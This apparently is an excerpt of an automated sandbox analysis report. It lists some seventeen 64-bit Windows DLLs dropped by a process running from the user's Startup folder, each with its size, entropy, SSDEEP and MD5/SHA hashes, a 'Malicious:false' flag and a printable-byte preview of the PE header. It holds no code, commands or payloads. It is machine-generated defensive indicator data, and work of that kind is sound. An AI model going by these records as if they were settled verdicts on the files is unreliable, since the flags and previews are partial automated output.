                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N4.|.U./.U./.U./.-a/.U./.*...U./A-...U./.U./!U./.*...U./.*...U./.*...U./0....U./0....U./0../.U./0....U./Rich.U./................PE..d......e.........." ...%.....8......`........................................@............`.........................................`...h.......d.... .......................0..,.......................................@............................................text............................... ..`.rdata..*...........................@..@.data...............................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..,....0......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):10752
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.488437566846231
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:tpVVdJvbrqTu6ZdpvY0IluLfcC75JiC4cs89EfqADwhDTAbcX6gn/7EC:5VddiT7pgTctdErDwDTicqgn/7
                                                                                                                                                                                                                                                                                                MD5:289EBF8B1A4F3A12614CFA1399250D3A
                                                                                                                                                                                                                                                                                                SHA1:66C05F77D814424B9509DD828111D93BC9FA9811
                                                                                                                                                                                                                                                                                                SHA-256:79AC6F73C71CA8FDA442A42A116A34C62802F0F7E17729182899327971CFEB23
                                                                                                                                                                                                                                                                                                SHA-512:4B95A210C9A4539332E2FB894D7DE4E1B34894876CCD06EEC5B0FC6F6E47DE75C0E298CF2F3B5832C9E028861A53B8C8E8A172A3BE3EC29A2C9E346642412138
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.h.r.h.r.h.{...p.h.g.i.p.h.9.i.q.h.r.i.V.h.g.m.y.h.g.l.z.h.g.k.q.h.H.`.s.h.H.h.s.h.H...s.h.H.j.s.h.Richr.h.........................PE..d....e.........." ...%............P........................................p............`..........................................'..P...0(..P....P.......@...............`..,...P#..............................."..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):10240
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.730605326965181
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:MJVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EVAElIijKDQGrbMZYJWJcX6gbW6s:CVddiT7pgTctEEaEDKDlMCWJcqgbW6
                                                                                                                                                                                                                                                                                                MD5:4D9C33AE53B38A9494B6FBFA3491149E
                                                                                                                                                                                                                                                                                                SHA1:1A069E277B7E90A3AB0DCDEE1FE244632C9C3BE4
                                                                                                                                                                                                                                                                                                SHA-256:0828CAD4D742D97888D3DFCE59E82369317847651BBA0F166023CB8ACA790B2B
                                                                                                                                                                                                                                                                                                SHA-512:BDFBF29198A0C7ED69204BF9E9B6174EBB9E3BEE297DD1EB8EB9EA6D7CAF1CC5E076F7B44893E58CCF3D0958F5E3BDEE12BD090714BEB5889836EE6F12F0F49E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d....e.........." ...%............P........................................p............`..........................................'..|....'..P....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):10240
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.685843290341897
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:6ZVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EMz3DHWMoG4BcX6gbW6O:IVddiT7pgTctEEO3DLoHcqgbW6
                                                                                                                                                                                                                                                                                                MD5:8F4313755F65509357E281744941BD36
                                                                                                                                                                                                                                                                                                SHA1:2AAF3F89E56EC6731B2A5FA40A2FE69B751EAFC0
                                                                                                                                                                                                                                                                                                SHA-256:70D90DDF87A9608699BE6BBEDF89AD469632FD0ADC20A69DA07618596D443639
                                                                                                                                                                                                                                                                                                SHA-512:FED2B1007E31D73F18605FB164FEE5B46034155AB5BB7FE9B255241CFA75FF0E39749200EB47A9AB1380D9F36F51AFBA45490979AB7D112F4D673A0C67899EF4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d....e.........." ...%............P........................................p............`.........................................`'..t....'..P....P.......@...............`..,...."...............................!..@............ ...............................text...x........................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):119192
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.6016214745004635
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
                                                                                                                                                                                                                                                                                                MD5:BE8DBE2DC77EBE7F88F910C61AEC691A
                                                                                                                                                                                                                                                                                                SHA1:A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
                                                                                                                                                                                                                                                                                                SHA-256:4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
                                                                                                                                                                                                                                                                                                SHA-512:0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.....cW.........." ...&. ...d......................................................-.....`A.........................................e..4...4m...........................O...........N..p............................L..@............0...............................text...&........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):49528
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.662491747506177
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:wPIyGVrxmKqOnA4j3z6Su77A+i0QLxi9z9Rtii9zn+:fBr87uW1nA8QLx+zrti+zn+
                                                                                                                                                                                                                                                                                                MD5:F8DFA78045620CF8A732E67D1B1EB53D
                                                                                                                                                                                                                                                                                                SHA1:FF9A604D8C99405BFDBBF4295825D3FCBC792704
                                                                                                                                                                                                                                                                                                SHA-256:A113F192195F245F17389E6ECBED8005990BCB2476DDAD33F7C4C6C86327AFE5
                                                                                                                                                                                                                                                                                                SHA-512:BA7F8B7AB0DEB7A7113124C28092B543E216CA08D1CF158D9F40A326FB69F4A2511A41A59EA8482A10C9EC4EC8AC69B70DFE9CA65E525097D93B819D498DA371
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9@.W}!..}!..}!...S...!..{....!..tYJ.v!..}!..N!..{...x!..{...z!..{...f!..{...|!..{.&.|!..{...|!..Rich}!..................PE..d.....v..........." ...&.<...8.......B...................................................`A........................................Pm.......m..x....................r..xO......D....c..p...........................`b..@............P..`............................text...p:.......<.................. ..`.rdata...#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):71448
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.247581706260346
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:rRaPPkDN3nkiP6djtX5IkTIL1yUvGJtIAOnT7SyqWx5:9anmN3nkikjV5IkTIL1yUuJtIAOnTgi
                                                                                                                                                                                                                                                                                                MD5:209CBCB4E1A16AA39466A6119322343C
                                                                                                                                                                                                                                                                                                SHA1:CDCCE6B64EBF11FECFF739CBC57E7A98D6620801
                                                                                                                                                                                                                                                                                                SHA-256:F7069734D5174F54E89B88D717133BFF6A41B01E57F79957AB3F02DAA583F9E2
                                                                                                                                                                                                                                                                                                SHA-512:5BBC4EDE01729E628260CF39DF5809624EAE795FD7D51A1ED770ED54663955674593A97B78F66DBF6AE268186273840806ED06D6F7877444D32FDCA031A9F0DA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z2.T.S...S...S...+r..S...,...S...,...S...,...S...,...S..$....S..U+...S...S...S..$....S..$....S..$....S..$....S..Rich.S..........PE..d......e.........." ...%.f................................................... ......')....`.............................................P......d......................../..............T...........................@...@............................................text...=d.......f.................. ..`.rdata..pO.......P...j..............@..@.data...(...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):84760
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.5874715807724025
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:RS7z7Sj2u5in5IVfC83zYxzbdK87kW1IACVw7SyrxX:I7z+jum3MJdN7kW1IACVwX
                                                                                                                                                                                                                                                                                                MD5:59D60A559C23202BEB622021AF29E8A9
                                                                                                                                                                                                                                                                                                SHA1:A405F23916833F1B882F37BDBBA2DD799F93EA32
                                                                                                                                                                                                                                                                                                SHA-256:706D4A0C26DD454538926CBB2FF6C64257C3D9BD48C956F7CABD6DEF36FFD13E
                                                                                                                                                                                                                                                                                                SHA-512:2F60E79603CF456B2A14B8254CEC75CE8BE0A28D55A874D4FB23D92D63BBE781ED823AB0F4D13A23DC60C4DF505CBF1DBE1A0A2049B02E4BDEC8D374898002B1
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R...S..R.....R...W..R...V..R...Q..R...S..R..S..R..S..R..._..R...R..R......R...P..R.Rich.R.........................PE..d......e.........." ...%.....^......|........................................P......-B....`.............................................H............0....... ..,......../...@..........T...........................p...@............................................text...k........................... ..`.rdata..p>.......@..................@..@.data...............................@....pdata..,.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):182784
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.193615170968096
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:YRAMUp3K6YoDssyudy4VcRG+nR3hnW3mjwwOdkS9S7iSSTLkK/jftw3buz:Y6MyK65ssy+MG+LnSUwjD9zSSTLL/jl8
                                                                                                                                                                                                                                                                                                MD5:0572B13646141D0B1A5718E35549577C
                                                                                                                                                                                                                                                                                                SHA1:EEB40363C1F456C1C612D3C7E4923210EAE4CDF7
                                                                                                                                                                                                                                                                                                SHA-256:D8A76D1E31BBD62A482DEA9115FC1A109CB39AF4CF6D1323409175F3C93113A7
                                                                                                                                                                                                                                                                                                SHA-512:67C28432CA8B389ACC26E47EB8C4977FDDD4AF9214819F89DF07FECBC8ED750D5F35807A1B195508DD1D77E2A7A9D7265049DCFBFE7665A7FD1BA45DA1E4E842
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(...I.C.I.C.I.C.1MC.I.C.<.B.I.C.&#C.I.C.<.B.I.C.<.B.I.C.<.B.I.C.1.B.I.C.4.B.I.C.I.C I.C.<.B.I.C.1KC.I.C.<.B.I.C.<!C.I.C.<.B.I.CRich.I.C................PE..d...g..e.........." .........@......`........................................@............`..........................................w..l....w....... ..........l............0.......]...............................]..8............................................text............................... ..`.rdata..............................@..@.data...h].......0...|..............@....pdata..l...........................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):125208
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.128664719423826
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:DGR936Xz4mHFK0K+bRFOoP+Szlf/EZZBKYyucV6rOoZIALPEA:qQHLK+bvvPNhf/Ei6CoX
                                                                                                                                                                                                                                                                                                MD5:2A834C3738742D45C0A06D40221CC588
                                                                                                                                                                                                                                                                                                SHA1:606705A593631D6767467FB38F9300D7CD04AB3E
                                                                                                                                                                                                                                                                                                SHA-256:F20DFA748B878751EA1C4FE77A230D65212720652B99C4E5577BCE461BBD9089
                                                                                                                                                                                                                                                                                                SHA-512:924235A506CE4D635FA7C2B34E5D8E77EFF73F963E58E29C6EF89DB157BF7BAB587678BB2120D09DA70594926D82D87DBAA5D247E861E331CF591D45EA19A117
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......x...<...<...<...5.*.:...)...>...)...0...)...4...)...8.......>...w...=...w...:.......?...<..........:.......=.....F.=.......=...Rich<...........................PE..d......e.........." ...%............p_..............................................]R....`.........................................``.......`.........................../......p.......T...............................@............................................text............................... ..`.rdata..Xl.......n..................@..@.data....4.......0...j..............@....pdata..............................@..@.rsrc...............................@..@.reloc..p...........................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):252696
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.564448148079112
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6144:Agvd9YyMipyD41q8xDiw9qWM53pLW1AQRRRrBoZtcr3:AQ8yryD47hix4orcr3
                                                                                                                                                                                                                                                                                                MD5:F930B7550574446A015BC602D59B0948
                                                                                                                                                                                                                                                                                                SHA1:4EE6FF8019C6C540525BDD2790FC76385CDD6186
                                                                                                                                                                                                                                                                                                SHA-256:3B9AD1D2BC9EC03D37DA86135853DAC73B3FE851B164FE52265564A81EB8C544
                                                                                                                                                                                                                                                                                                SHA-512:10B864975945D6504433554F9FF11B47218CAA00F809C6BCE00F9E4089B862190A4219F659697A4BA5E5C21EDBE1D8D325950921E09371ACC4410469BD9189EE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........mBP\.,.\.,.\.,.Ut..R.,.Is-.^.,.Is).Q.,.Is(.T.,.Is/.X.,.f.-._.,..t-.^.,.\.-...,.f./.].,.f.!.S.,.f.,.].,.f...].,.f...].,.Rich\.,.........PE..d......e.........." ...%.t...<......................................................6.....`.........................................@T..P....T..................0'......./......P...@...T...............................@............................................text....r.......t.................. ..`.rdata...............x..............@..@.data....*...p...$...P..............@....pdata..0'.......(...t..............@..@.rsrc...............................@..@.reloc..P...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):65816
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.242741772115205
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:MElYij3wz91lBafLEmIRhtIAOIW7SybpxC:hYZBaTEmghtIAOIWE
                                                                                                                                                                                                                                                                                                MD5:B0262BD89A59A3699BFA75C4DCC3EE06
                                                                                                                                                                                                                                                                                                SHA1:EB658849C646A26572DEA7F6BFC042CB62FB49DC
                                                                                                                                                                                                                                                                                                SHA-256:4ADFBBD6366D9B55D902FC54D2B42E7C8C989A83016ED707BD7A302FC3FC7B67
                                                                                                                                                                                                                                                                                                SHA-512:2E4B214DE3B306E3A16124AF434FF8F5AB832AA3EEB1AA0AA9B49B0ADA0928DCBB05C57909292FBE3B01126F4CD3FE0DAC9CC15EAEA5F3844D6E267865B9F7B1
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........u...&...&...&.}&...&..'...&..'...&..'...&..'...&...'...&.x.'...&...&}..&.x.'...&.x.'...&.x.&...&.x.'...&Rich...&........................PE..d.....e.........." ...%.T..........P@....................................................`.............................................P.............................../......X...@}..T............................|..@............p..(............................text....S.......T.................. ..`.rdata..&O...p...P...X..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):159512
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.846323229710623
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:Fik7me1FFD+znfF9mNo+Mu6tmxzE41IAZ1Ak:FikSiUNYO+J1E4b
                                                                                                                                                                                                                                                                                                MD5:B71DBE0F137FFBDA6C3A89D5BCBF1017
                                                                                                                                                                                                                                                                                                SHA1:A2E2BDC40FDB83CC625C5B5E8A336CA3F0C29C5F
                                                                                                                                                                                                                                                                                                SHA-256:6216173194B29875E84963CD4DC4752F7CA9493F5B1FD7E4130CA0E411C8AC6A
                                                                                                                                                                                                                                                                                                SHA-512:9A5C7B1E25D8E1B5738F01AEDFD468C1837F1AC8DD4A5B1D24CE86DCAE0DB1C5B20F2FF4280960BC523AEE70B71DB54FD515047CDAF10D21A8BEC3EBD6663358
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......RH:..)T..)T..)T..Q...)T..VU..)T..VQ..)T..VP..)T..VW..)T.,.U..)T.]QU..)T..)U.s)T.,.Y.,)T.,.T..)T.,....)T.,.V..)T.Rich.)T.........PE..d.....e.........." ...%.d...........6....................................................`......................................... %..L...l%..x....p.......P.......@.../......4.......T...............................@............................................text....b.......d.................. ..`.rdata..............h..............@..@.data...(....@......................@....pdata.......P....... ..............@..@.rsrc........p.......4..............@..@.reloc..4............>..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):35096
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.461229529356597
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:OgYvrenSE0PXxxQ0zi+mdIAWtd5YiSyviCAMxkEj:vYTQShxQ0zlmdIAWtD7SyKAxv
                                                                                                                                                                                                                                                                                                MD5:4CCBD87D76AF221F24221530F5F035D1
                                                                                                                                                                                                                                                                                                SHA1:D02B989AAAC7657E8B3A70A6EE7758A0B258851B
                                                                                                                                                                                                                                                                                                SHA-256:C7BBCFE2511FD1B71B916A22AD6537D60948FFA7BDE207FEFABEE84EF53CAFB5
                                                                                                                                                                                                                                                                                                SHA-512:34D808ADAC96A66CA434D209F2F151A9640B359B8419DC51BA24477E485685AF10C4596A398A85269E8F03F0FC533645907D7D854733750A35BF6C691DE37799
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........*..y..y..y..y..y...x..y...x..y...x..y...x..y.J.x..y..y..y...x..y.J.x..y.J.x..y.Jky..y.J.x..yRich..y................PE..d......e.........." ...%.....>......P...............................................^.....`.........................................0E..`....E..x............p.......Z.../...........4..T............................3..@............0...............................text............................... ..`.rdata..r ...0..."..."..............@..@.data........`.......D..............@....pdata.......p.......J..............@..@.rsrc................N..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):55576
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.342203411267264
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:wXRnts3McbN6w/xzWssXZdR1r3RIAXtI7SyNxQ:IRvcsXZdR1rRIAXtI6
                                                                                                                                                                                                                                                                                                MD5:61193E813A61A545E2D366439C1EE22A
                                                                                                                                                                                                                                                                                                SHA1:F404447B0D9BFF49A7431C41653633C501986D60
                                                                                                                                                                                                                                                                                                SHA-256:C21B50A7BF9DBE1A0768F5030CAC378D58705A9FE1F08D953129332BEB0FBEFC
                                                                                                                                                                                                                                                                                                SHA-512:747E4D5EA1BDF8C1E808579498834E1C24641D434546BFFDFCF326E0DE8D5814504623A3D3729168B0098824C2B8929AFC339674B0D923388B9DAC66F5D9D996
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j.{..w(..w(..w(.s.(..w(.tv)..w(.tr)..w(.ts)..w(.tt)..w(.v)..w(..v(..w(.sv)..w(.ss)..w(.z)..w(.w)..w(..(..w(.u)..w(Rich..w(........................PE..d......e.........." ...%.L...`............................................................`.............................................X...X............................/......(....f..T............................e..@............`...............................text....J.......L.................. ..`.rdata..D8...`...:...P..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..(...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):32536
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.4674944702653665
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:0k+cae6rjp5MoNOfZIAQUM5YiSyvjAMxkEKu:5vSjgoNOfZIAQU27SyLxv
                                                                                                                                                                                                                                                                                                MD5:F3ECA4F0B2C6C17ACE348E06042981A4
                                                                                                                                                                                                                                                                                                SHA1:EB694DDA8FF2FE4CCAE876DC0515A8EFEC40E20E
                                                                                                                                                                                                                                                                                                SHA-256:FB57EE6ADF6E7B11451B6920DDD2FB943DCD9561C9EAE64FDDA27C7ED0BC1B04
                                                                                                                                                                                                                                                                                                SHA-512:604593460666045CA48F63D4B14FA250F9C4B9E5C7E228CC9202E7692C125AACB0018B89FAA562A4197692A9BC3D2382F9E085B305272EE0A39264A2A0F53B75
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z2.\.Sa..Sa..Sa..+...Sa..,`..Sa..,d..Sa..,e..Sa..,b..Sa.$.`..Sa.U+`..Sa..S`.USa.$.l..Sa.$.a..Sa.$...Sa.$.c..Sa.Rich.Sa.........PE..d......e.........." ...%.....8.......................................................I....`..........................................C..L....C..d....p.......`.......P.../..........p4..T...........................03..@............0..8............................text...(........................... ..`.rdata.......0......................@..@.data........P.......<..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):83224
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.338326324626716
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:MUuhDLiJfz76Xl+1ly+uCt9/s+S+pzcHS58/n1IsJHfsZIALwqw7Syraxi:MU6DL4fHdy+uCt9/sT+pzuSQ1IwHfsZS
                                                                                                                                                                                                                                                                                                MD5:9C6283CC17F9D86106B706EC4EA77356
                                                                                                                                                                                                                                                                                                SHA1:AF4F2F52CE6122F340E5EA1F021F98B1FFD6D5B6
                                                                                                                                                                                                                                                                                                SHA-256:5CC62AAC52EDF87916DEB4EBBAD9ABB58A6A3565B32E7544F672ACA305C38027
                                                                                                                                                                                                                                                                                                SHA-512:11FD6F570DD78F8FF00BE645E47472A96DAFFA3253E8BD29183BCCDE3F0746F7E436A106E9A68C57CC05B80A112365441D06CC719D51C906703B428A32C93124
                                                                                                                                                                                                                                                                                                Malicious:false
